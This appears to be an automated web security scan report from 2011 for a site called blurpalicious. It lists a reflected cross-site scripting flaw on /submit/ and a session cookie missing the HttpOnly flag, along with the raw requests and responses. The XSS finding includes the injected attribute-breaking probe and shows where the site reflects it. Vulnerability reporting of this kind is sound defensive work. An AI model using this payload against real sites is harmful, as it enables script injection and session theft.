1. Cross-site scripting (reflected)
2. Cookie without HttpOnly flag set
Severity: | High |
Confidence: | Certain |
Host: | http://www.blurpalicious |
Path: | /submit/ |
GET /submitbbc96"style%3d"x Host: www.blurpalicious.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 14:21:22 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.16 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=d4f1d7c3f1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 20463 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html dir="ltr" xmlns="http://www.w3.org ...[SNIP]... <meta name="keywords" content="submitbbc96"style="x:expression ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://www.blurpalicious |
Path: | /submit/ |
GET /submit/ HTTP/1.1 Host: www.blurpalicious.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 302 Moved Temporarily Date: Sun, 17 Apr 2011 14:20:58 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.16 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=88242b51cb Location: /login.php?return=/submit Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 |